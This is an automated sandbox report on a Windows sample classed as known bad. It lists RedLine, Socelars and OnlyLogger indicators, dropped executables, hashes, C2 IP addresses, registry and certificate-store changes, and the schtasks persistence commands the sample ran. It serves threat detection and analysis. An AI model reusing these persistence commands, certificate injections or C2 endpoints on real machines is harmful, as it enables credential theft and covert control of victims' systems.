Analysis Overview
SHA256
611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
Threat Level: Known bad
The file Service.bmpgplkoxjs was found to be: Known bad.
Malicious Activity Summary
OnlyLogger
RedLine
RedLine Payload
Modifies Windows Defender Real-time Protection settings
Process spawned unexpected child process
Socelars Payload
Socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM)
OnlyLogger Payload
VMProtect packed file
Executes dropped EXE
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads user/profile data of web browsers
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Kills process with taskkill
Delays execution with timeout.exe
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-04 03:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-04 03:42
Reported
2022-04-04 06:12
Platform
win7-20220311-en
Max time kernel
4294211s
Max time network
143s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
"C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
"C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 364
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.70:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| NL | 104.110.191.14:80 | repository.certum.pl | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
Files
memory/1220-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1248-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1520-59-0x0000000000000000-mapping.dmp
memory/392-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81180798f4d48d852ec031c3eed10781 |
| SHA1 | b66bbc8d7a8e5e0c65b0d9c624f2c13e6bfe8c61 |
| SHA256 | f901a508db08da3d9cc47b3eade0ddc2bbb273b92cccecfe26df7a6df9f9e4bc |
| SHA512 | 4de8e91721ce37693c410a38ee5fb73ca260b8006904916fbb1892114918b2ced1bfb1d5a4195e666d94ae1fdfbef4932c128b5c2e8e76036869ea11a1a31c58 |
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1248-63-0x0000000003F10000-0x00000000040CF000-memory.dmp
\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
| MD5 | 3f22bd82ee1b38f439e6354c60126d6d |
| SHA1 | 63b57d818f86ea64ebc8566faeb0c977839defde |
| SHA256 | 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a |
| SHA512 | b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f |
memory/1548-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
| MD5 | 3f22bd82ee1b38f439e6354c60126d6d |
| SHA1 | 63b57d818f86ea64ebc8566faeb0c977839defde |
| SHA256 | 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a |
| SHA512 | b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f |
memory/700-67-0x0000000000000000-mapping.dmp
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-04 03:42
Reported
2022-04-04 06:15
Platform
win10v2004-20220310-en
Max time kernel
58s
Max time network
154s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
OnlyLogger
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Socelars
Socelars Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
OnlyLogger Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
"C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
